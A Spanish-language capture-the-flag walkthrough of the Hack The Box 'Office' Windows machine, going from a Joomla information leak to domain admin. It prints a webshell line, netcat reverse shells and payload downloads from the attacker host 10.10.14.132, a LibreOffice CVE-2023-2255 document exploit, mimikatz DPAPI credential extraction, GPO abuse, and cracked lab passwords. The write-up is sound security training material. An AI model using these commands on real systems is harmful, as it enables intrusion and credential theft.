Office

OS: Windows
Dificultad: Difícil
Puntos: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.10.11.3 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.10.11.3
Nmap scan report for 10.10.11.3
Host is up (0.078s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-title: Home
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-08 00:30:15Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
443/tcp   open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn: 
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-06-08T00:31:51+00:00; +7h59m56s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
54080/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54086/tcp open  msrpc         Microsoft Windows RPC
54112/tcp open  msrpc         Microsoft Windows RPC
63359/tcp open  msrpc         Microsoft Windows RPC
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Si accedemos al portal web en el puerto 80 vemos que esta utilizando Joomla asi como tambien lo menciona el escaneo de nmap.

Enumeramos la version que se esta utilizando.

curl http://10.10.11.3/administrator/manifests/files/joomla.xml | grep version
<?xml version="1.0" encoding="UTF-8"?>
        <license>GNU General Public License version 2 or later; see LICENSE.txt</license>
        <version>4.2.7</version>

La version utilzada es 4.2.7 la cual tiene un CVE registrado API Unauthenticated Information Disclosure (CVE-2023-23752). Consultando la siguiente URL obtenemos un password.

curl 'http://10.10.11.3/api/index.php/v1/config/application?public=true'
{"type":"application","id":"224","attributes":{"password":"H0lOgrams4reTakIng0Ver754!","id":224}

Kerbrute Enum

Tambien enumeramos usuarios con kerbrute.

/opt/windows/kerbrute userenum -d office.htb --dc 10.10.11.3  /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
2024/06/07 12:56:03 >  [+] VALID USERNAME:       administrator@office.htb
2024/06/07 12:57:51 >  [+] VALID USERNAME:       Administrator@office.htb
2024/06/07 12:58:49 >  [+] VALID USERNAME:       ewhite@office.htb                                                                                                                                
2024/06/07 12:58:49 >  [+] VALID USERNAME:       etower@office.htb
2024/06/07 12:58:49 >  [+] VALID USERNAME:       dwolfe@office.htb
2024/06/07 12:58:50 >  [+] VALID USERNAME:       dmichael@office.htb
2024/06/07 12:58:50 >  [+] VALID USERNAME:       dlanor@office.htb

Con esos usuarios hacemos password spray usando crackmapexec.

crackmapexec smb 10.10.11.3 -u users.txt -p 'H0lOgrams4reTakIng0Ver754!'
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [-] office.htb\ewhite:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [-] office.htb\etower:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!

El password funciona con el usario dwolfe.

dwolfe : H0lOgrams4reTakIng0Ver754!

SMB Enum

Utilizando las credenciales vemos que hay un directorio compartido.

smbclient -L 10.10.11.3 -U dwolfe
Password for [WORKGROUP\dwolfe]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SOC Analysis    Disk      
        SYSVOL          Disk      Logon server share

Accediendo al directorio hay un archivo pcap que podemos descargar.

smbclient '//10.10.11.3/SOC Analysis' -U dwolfe
smb: \> dir
  .                                   D        0  Wed May 10 14:52:24 2023
  ..                                DHS        0  Wed Feb 14 05:18:31 2024
  Latest-System-Dump-8fbc124d.pcap      A  1372860  Sun May  7 20:59:00 2023

                6265599 blocks of size 4096. 1210820 blocks available
smb: \> get Latest-System-Dump-8fbc124d.pcap
getting file \Latest-System-Dump-8fbc124d.pcap of size 1372860 as Latest-System-Dump-8fbc124d.pcap (635.7 KiloBytes/sec) (average 635.7 KiloBytes/sec)

Wireshark Analysis

Despues de analizar el archivo encontramos un par de paquetes kerberos que contiene un hash pre-auth que posible crackearlo.

Nos ayudamos de este blog que nos explica el metodo.

https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets/

Copiamos la informacion el hash.

$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc

Crack hash

Utilizando hashcat obtenemos el password.

hashcat -m 19900 hash.txt /usr/share/wordlists/rockyou.txt
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 3 secs

$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69

Joomla RCE

Con esas credenciales podemos acceder al joomla.

administrator : playboy69

Podemos obtener rce de la siguiente forma.

https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce

Navegamos a la siguiente URL.

http://10.10.11.3/administrator/index.php?option=com_templates&view=template&id=223&file=Ly9lcnJvci5waHA%3D&isMedia=0

Modificamos el archivo error.php y guardamos.

system($_GET['cmd']);

Ahora consultamos nuestra webshell.

http://10.10.11.3/templates/cassiopeia/error.php?cmd=whoami

Revershe shell

Ejecutamos los siguientes comando para sacar reverse shell.

mkdir c:\temp
curl 10.10.14.132/nc64.exe -o c:\temp\nc.exe
c:\temp\nc.exe -e cmd.exe 10.10.14.132 1234
┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51769
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\joomla\templates\cassiopeia>whoami
whoami
office\web_account

Lateral Movement

Se encuentra un puerto local abierto 8083.

netstat -ano
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8083           0.0.0.0:0              LISTENING       1032
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING       2628

El puerto nos muestra una pagina web.

c:\>curl localhost:8083
<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="css/squarely.css">
    <!--common.css  -->
      <link rel="stylesheet" href="css/common.css">
    <title>Holography Industries</title>
  </head>
  <body>

Los archivos de esta pagina web se encuentran en la siguiente ruta.

dir c:\xampp\htdocs\internal

En el codigo resume.php vemos que almacena archivos odt en el directorio applications.

 $extension = strtolower(end($ext));
  $filesallowed = array('docm','docx','doc','odt');
   if(in_array($extension,$filesallowed)){
     if ($fileerr === 0){
       if ($filesize < 5242880){
         $ff = "$rewritefn.$extension";
         $loc = "applications/".$ff;
           if(move_uploaded_file($filetmp,$loc))
           {
             // upload successful
             $notifi="<span class=notifi>✔ Upload Successful!</span><hr/><style>
               button, input , select, option, h3{
                        display:none;
                }
               </style>";
         } else {

LibreOffice (CVE-2023-2255)

Tambien en los programas del sistema encontramos LibreOffice instalado en su version 5.2.

C:\> type "Program Files\Libre Office 5\readmes\readme_en-US.txt"


======================================================================

We hope you enjoy working with the new LibreOffice 5.2 and will join us online.

======================================================================

La version de LibreOffice es vulnerable al siguiente exploit.

https://github.com/elweth-sec/CVE-2023-2255

Por lo tanto pdodemos explotar la vuln creando nuestro archivo y dejandolo en el directorio applications.

┌──(root㉿kali)-[~/htb/Box/Office/CVE-2023-2255]
└─# python3 CVE-2023-2255.py --cmd "c:\temp\nc.exe -e cmd.exe 10.10.14.132 4444" --output 'doom.odt'
File doom.odt has been created !

Descargamos nuestro archivo.

curl 10.10.14.132/doom.odt -o doom.odt
c:\xampp\htdocs\internal\applications>curl 10.10.14.132/doom.odt -o doom.odt                                                                                                                      
curl 10.10.14.132/doom.odt -o doom.odt                                                                                                                                                            
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                                                                                                   
                                 Dload  Upload   Total   Spent    Left  Speed                                                                                                                     
100 30529  100 30529    0     0   121k      0 --:--:-- --:--:-- --:--:--  121k                                                                                                                    
                                                                                                                                                                                                  
c:\xampp\htdocs\internal\applications>dir                                                                                                                                                         
dir                                                                                                                                                                                               
 Volume in drive C has no label.                                                                                                                                                                  
 Volume Serial Number is C626-9388                                                                                                                                                                
                                                                                                                                                                                                  
 Directory of c:\xampp\htdocs\internal\applications                                                                                                                                               
                                                                                                                                                                                                  
06/07/2024  08:33 PM    <DIR>          .                                                                                                                                                          
01/30/2024  09:39 AM    <DIR>          ..
06/07/2024  08:33 PM            30,529 doom.odt
               1 File(s)         30,529 bytes
               2 Dir(s)   4,918,906,880 bytes free

Esperamos un momento y obtenemos nuestra reverse shell.

┌──(root㉿kali)-[~/htb/Box/Office]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.132] from (UNKNOWN) [10.10.11.3] 51999
Microsoft Windows [Version 10.0.20348.2322]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice 5\program>whoami
whoami
office\ppotts

Privilege Escalation

Vemos que hay credenciales almacenadas.

Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\
    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-          5/9/2023   2:08 PM            358 18A1927A997A794B65E9849883AC3F3E                                     
-a-hs-          5/9/2023   4:03 PM            398 84F1CAEEBF466550F4967858F9353FB4                                     
-a-hs-         1/18/2024  11:53 AM            374 E76CCA3670CD9BB98DF79E0A8D176F1E

Tambien localizamos la master keys.

dir C:\Users\PPotts\AppData\Roaming\Microsoft\Protect
    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d---s-          6/7/2024   5:02 AM                S-1-5-21-1199398058-4196589450-691661856-1107
Get-ChildItem -Hidden C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-         1/17/2024   3:43 PM            740 10811601-0fa9-43c2-97e5-9bef8471fc7d                                 
-a-hs-          5/2/2023   4:13 PM            740 191d3f9d-7959-4b4d-a520-a444853c47eb                                 
-a-hs-          5/2/2023   4:13 PM            900 BK-OFFICE                                                            
-a-hs-          6/7/2024   5:02 AM            740 da923a1f-5364-4062-806c-9553f2d997e6                                 
-a-hs-          6/7/2024   5:02 AM             24 Preferred

Utilizando el siguiente recurso podemos extraer passwords.

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

DPAPI Credentials

Para acceder a esas credenciales utilizaremos mimikatz.

c:\temp>curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
curl 10.10.14.132/mimikatz.exe -o mimikatz.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 1220k  100 1220k    0     0   859k      0  0:00:01  0:00:01 --:--:--  859k
mimikatz # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\credentials\84F1CAEEBF466550F4967858F9353FB4
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006603 - 26115 (CALG_3DES)
  dwAlgCryptLen      : 000000c0 - 192
  dwSaltLen          : 00000010 - 16
  pbSalt             : 649c4466d5d647dd2c595f4e43fb7e1d
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         : 
  algHash            : 00008004 - 32772 (CALG_SHA1)
  dwAlgHashLen       : 000000a0 - 160
  dwHmac2KeyLen      : 00000010 - 16
  pbHmack2Key        : 32e88dfd1927fdef0ede5abf2c024e3a
  dwDataLen          : 000000c0 - 192
  pbData             : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
  dwSignLen          : 00000014 - 20
  pbSign             : 21bfb22ca38e0a802e38065458cecef00b450976

Extraemos y desciframos la masterkey.

dpapi::masterkey /in:C:\Users\PPotts\appdata\roaming\microsoft\protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
  key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  sha1: 85285eb368befb1670633b05ce58ca4d75c73c77

Extraemos el password con la masterkey.

dpapi::cred /in:"C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4" /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 5/9/2023 11:03:21 PM
  unkFlagsOrSize : 00000018 - 24
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=OFFICE\HHogan
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : OFFICE\HHogan
  CredentialBlob : H4ppyFtW183#
  Attributes     : 0

Con esas credenciales nos conectamos por winrm.

┌──(root㉿kali)-[~/htb/Box/Office]
└─# evil-winrm -i 10.10.11.3 -u hhogan -p 'H4ppyFtW183#'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\HHogan\Documents> whoami
office\hhogan
*Evil-WinRM* PS C:\Users\HHogan\Documents>

Este usuario pertenece al grupo GPO Managers.

*Evil-WinRM* PS C:\Users\HHogan\Documents> net user hhogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 11:59:34 AM
Password expires             Never
Password changeable          5/7/2023 11:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 5:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

SharpGPOAbuse - Abuse GPO

Podemos abusar de estre grupo con la herramienta SharpGPOAbuse.

*Evil-WinRM* PS C:\temp> curl 10.10.14.132/SharpGPOAbuse.exe -o SharpGPOAbuse.exe
*Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/7/2024   8:55 PM        1250056 mimikatz.exe
-a----          6/7/2024   7:53 PM          45272 nc.exe
-a----          6/7/2024   9:28 PM          80896 SharpGPOAbuse.exe

Creamos una politica.

*Evil-WinRM* PS C:\temp> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount HHogan --GPOName "Default Domain Policy"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of HHogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!

Actualizamos las politicas.

*Evil-WinRM* PS C:\temp> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.

Ahora somos administradores.

*Evil-WinRM* PS C:\temp> net user hhogan
User name                    HHogan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/6/2023 11:59:34 AM
Password expires             Never
Password changeable          5/7/2023 11:59:34 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/10/2023 5:30:58 AM

Logon hours allowed          All

Local Group Memberships      *Administrators       *Remote Management Use
Global Group memberships     *Domain Users         *GPO Managers
The command completed successfully.

Cerramos la sesion y nos conectamos otra vez para obtener las flags.

*Evil-WinRM* PS C:\users\Administrator\desktop> type root.txt
ec424b2bbacea5d3aa115ad4438a84f3
*Evil-WinRM* PS C:\users\Administrator\desktop> type c:\users\tstark\desktop\user.txt
d05e09504294d1337a0824ef8bef2898
*Evil-WinRM* PS C:\users\Administrator\desktop>